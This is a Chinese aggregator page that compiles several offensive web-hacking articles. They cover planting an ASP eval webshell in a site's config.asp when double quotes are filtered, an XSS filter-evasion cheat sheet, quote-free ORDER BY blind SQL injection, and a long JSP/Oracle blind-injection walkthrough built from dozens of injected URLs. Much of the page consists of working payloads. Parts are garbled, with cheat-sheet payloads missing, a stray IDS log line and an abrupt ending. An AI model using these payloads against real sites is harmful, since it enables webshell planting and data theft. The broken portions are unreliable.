当前位置：首页 > 实用文档 > 其他范文> 双引号被过滤时配置文件插一句话的方法脚本安全

双引号被过滤时配置文件插一句话的方法脚本安全

时间：2022-10-25 08:08:53 其他范文收藏本文下载本文

双引号被过滤时配置文件插一句话的方法脚本安全（集锦9篇）由网友“yu7days”投稿提供，下面是小编给大家带来的双引号被过滤时配置文件插一句话的方法脚本安全，以供大家参考，我们一起来看看吧!

篇1：双引号被过滤时配置文件插一句话的方法脚本安全

昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定，后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍给大家。

一般而言，后台插一句话，如果数据库扩展名是asp的话，那么插数据库，但是如果有配置文件可以插的话，那肯定是插入配置文件了，但是插入配置文件有一个很大的风险，那就是一旦出错那么全盘皆输，有可能不仅仅造成后台无法登陆，甚至有可能是整个网站系统崩溃，所以插入配置文件，请慎之又慎。

话归正题，如果想插入配置文件，一般是config.asp，那么首先需要了解这个文件的一般情况。

网站的配置一般是保存网站名，地址，email之类的，既然是字符，那么格式应当是webname=“test website”

对于这样的配置插入一句话的话，我们的机会就是替换test website，那么需要闭合2个“，同时要插入一句话，语句可以这样

”%><%eval request(“d”)%><%s=“

那么在config.asp中就是

webname=“ ”%><%eval request(“d”)%><%s=“ ”

第一个”是闭合前面的配置文件中的“，%>就是闭合前一段脚本，之后插入一句话<%eval request(”d“)%>，现在要闭合原来的”和%>

所以加入<%s=“，这里特别要注意“s=”，如果没有这个等号的话，那么就会成<%” “，这样必将出错。

好了，这是常规的办法，现在我们回到开始那个问题，按照前面的方法插入

插入后，我们再点击“网站设置” ，出现错误

从这个错误，我们可以得到2个信息。

第一，配置文件的路径：/zfbm/zfb/inc/config.asp

第二，网站名的变量为webname，

昨天由于很晚了，就没继续看，今天出差，晚上回来刚刚上Q，小刀刀就q我，说拿下了，并说这个后台过滤了双引号”，结合昨天的错误一看果然是，由于我们闭合前面双引号起“的那个双引号收”被过滤成单引号'，所以就成了webname=“ '，这样的话那么这个双引号没有闭合，由于双引号是vbscript的控制符，没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。

由于插入一句话必须要用双引号括起来，而输入双引号又被过滤，所以我们可以利用他们自身的双引号来解决。

在配置文件中，我们还可以看到这样一些设置

就是配置网站的公告数，文章数等。可以假设一下，他必然是整数赋值，没有双引号包括

num=5

num是整数型，不然就成字符了num=”5“

那么我们的一句话就可以这样构建，如图

在公告数中我们插入5%><%eval request(webname)%><%

必须要有5，不然将会出错，在网站名中我们插入”open“

由于我们没有输入双引号，不存在过滤，我们利用配置文件本身的双引号来达到目的。那么配置文件现在的内容如下：

<% .................... webname=”open“ num=5%><%eval request(webname)%><% webnum=7 ....... %>我们的一句话就相应为：

eval request(”open“)，open为密码。

用菜刀成功连接

从上可见，我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。

那么在网页设计方面，我们可以增加过滤<,%,>或者组合<%,%>这些特殊符号，禁止这些符号的输入，那么将大大增加网页安全。

篇2：当被过滤时

当你拿到shell以后发现对方的不知道是防火墙还是 ids 还是 hips 或者某某山寨产品竟然把

\ 给过滤了，无法路径跳转很不方便的说

下面提供邪恶的一小段代码以备急时所需

%tmp:~2,1%

篇3：XSS（跨站脚本攻击）逃避过滤脚本安全

XSS（跨站脚本攻击）备忘录

逃避过滤

出处：ha.ckers.org/xss.html

作者：RSnake

翻译：帝释天

如果你不知道如何进行XSS攻击，那么本文或许对你没有任何帮助，这里主要针对已经对基本的XSS攻击有所了解而想更加深入地理解关于绕过过滤的细节问题的读者。文中不会告诉你如何降低XSS的影响或者怎么去编写一些实际的攻击代码。你可以简单的得到一些最基本的方法来推测剩余的部分。

（介绍部分略，太基础的部分也略，罪过，希望RSnake大牛大人有大量）

不分大小写引起的XSS

Code:

包含HTML字符

Code:

沉音符混淆（如果你同事需要使用单双引号你可以使用沉音符放入javascript字符串中。因为不少过滤器不了解沉音符导致了漏洞）

Code:

畸形的IMG标签。最初由Beqeek发现（整理精简后可以工作于所有浏览器），该方法利用了松散的图形渲染引擎让我们能在被引号包围的IMG标签中创建自己的XSS。

Code: ”>

fromCharCode 如果你无法使用引号，你可以使用fromCharCode用于eval函数。

Code:

UTF-8编码

Code:

Long UTF-8 编码可以不使用分号，这样绕过一些正则检查

Code:

没有分号的Hex编码

Code:

嵌入TAB键进行攻击

Code:

嵌入编码过后的TAB键

Code:

嵌入新行可以进行XSS，一些网站上说char 09 – 13都可以为XSS攻击服务，那显然不正确。只有09 10 13才会正常工作。

Code:

SRC

“

(

)

”

NULL字符能逃避很多过滤系统

Code: perl -e 'print “”;' >out

Code: perl -e 'print “alert(\”XSS\“)”;' >out

多余的开放括号。提交弗兰兹泽德尔迈尔，这XSS的载体能战胜某些侦测引擎，通过使用匹配的第一个打开和关闭角括号对和做了比较，然后在标签内的工作，而不是像博耶-穆尔看起来更有效algorythm为整个字符串匹配的开角括号和相关的标签（后解除困惑，当然）。双斜线意见中提出的结局无关的支架，以制止JavaScript错误：

Code: <

未关闭的标签

Code:

各种其他的标签

Code:

(netspace)

Code:

Code: ; REL=stylesheet“>

Code:

XSS

Code: (netscape only)

Code:

US_ASCII编码（库尔特发现），

使用7位ascii编码代替8位，可以绕过很多过滤。但是必须服务器是以US-ASCII编码交互的。目前仅发现Apache Tomcat是以该方式交互。

Code: ?scriptualert(EXSSE)?/scriptu

META协议

Code:

对DIV进行unicode编码

Code:

使用expression属性

Code:

STYLE标签

Code:

OBJECT标签

Code:

EMBED标签

Code:

在flash文件中使用如下代码：

Code: a=”get“;

b=”URL(\“”;

c=“javascript.:”;

d=“alert('XSS');\”)“;

eval(a+b+c+d);

XML namespace可以引入行为文件htc但是必须在同一服务器上

Code:

XSS

Xss.htc:

使用CDATA模糊化的XML数据岛

Cdoe: ]]>

XML数据岛

Code：cript:alert('XSS')“>

Code:

(xsstest.xml)必须同域下

HTML+ TIME

Code:

UTF7编码

Code:+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

防止二次执行的expression语句

篇4：证明过滤单引号的ORDER BY可以注入脚本安全

题目：证明基于ORDER BY的SQL 注入，且单引号（’）被过滤，

已知：代码如下，有注入无悬念。

0Column = mysqli_real_escape_string($_GET['sort_column']);

$query =”SELECT * from cr0_3 WHERE active = true ORDER BY 0Column DESC“;

推理：

1.可以测试通过手段判断cr0_3的字段数量。不知道怎么做，就不要往下看了。

2.这个地方sort_column允许你进行boolean判断。可以推理出：

(CASE WHEN (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users where username = 0x61646D696E) = 65 THEN date ELSE title END)这个可以进行判断猜测字符串，

0x61646D696E值其实就是select hex('admin')。为了规避单引号。

3.还可以推理出以下判断语句：

if(true,id,price)

if(false,id,price)

(select case when (true) then id else price end)

if((selectchar(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)

注意，以上id,price不要换成1,2之类的。没有效果的。不信自己试。那么要知道id,price不是比较麻烦？

好。牛逼的思路来了。

4.可以推理出：

rand(true)

rand(false)

rand((selectchar(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))

得知：

该题目可以成功注入，过滤单引号，很多情况下是没什么用滴。

有些思路，的有意思。

篇5：JSP+ORACLE注入方法v1.0脚本安全

大家好 ,我们是pt007和solaris7，QQ：7491805/564935，欢迎高手前来交流：），

首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具，没有这个工具就没有本文，HEHE，本文是对cnsafersi 注入工具抓包后所获得的数据进行了分析和整理，文章写的比较仓促，有不足之处欢迎同行指正。另外希望有高手开发出功能更加强大的JSP注入程序，cnsafersi目前仅有select的功能，建议新的JSP注入工具中能加入insert/delete/update/backup/上传/执行系统命令等功能，可以参考NBSI的功能进行开发。参考文章：《如何开发CnSaferSI》。

首先介绍本文中所使用的工具之JSP注入利器：华仔和他的朋友Hotkey开发的cnsafersi，关于使用方法近期我会写一个详细的使用教程：

下面以上图中的AD表为例来说明JSP+ORACLE注入的过程：

1、判断注入类型（数字型还是字符型）

字符型和数字型数据判断：（希望有人能进一步的细化，细分为数字型和字符型判断两部分）

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And user

www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And user

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)>str(97) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)

出现正常的页面：

www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)

www.test.net/index_kaoyan_view.jsp?id=117 And USER

2、猜解表数量和表名

数据库数量为3：

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

以下为猜解数据表数量

数据表第一位为：1

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

数据表第二位为：3

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

数据表第三位为：1

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

共有131个数据表，见上图。

以下为猜解表名称：

以下为判断第一个表的长度为：2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

以下为判断第一个表的第一位值为：A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

以下为判断第一个表AD的第二位值为：D

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

以下为判断第二个表的表ADER的表名长度为：4

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

以下为判断第二个表ADER第一位的值为：A

以下为判断第二个表ADER第二位的值为：D

以下为判断第二个表ADER第三位的值为：E

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

以下为判断第二个表ADER第四位的值为：R

www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

以下为判断第三个表的表名长度为：

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

3、猜解列名长度和列名：

a) 以下为猜解字段长度为：2位

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

? 列名长度为：10位以上

以下猜解列名的长度的第一位为：1（十位）

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

以下猜解列名长度的第二位为：0（个位）

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

Informational 10/12/ 15:03:25 Suspect event: ICMP Time Exceeded (>1 for 1 seconds)

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

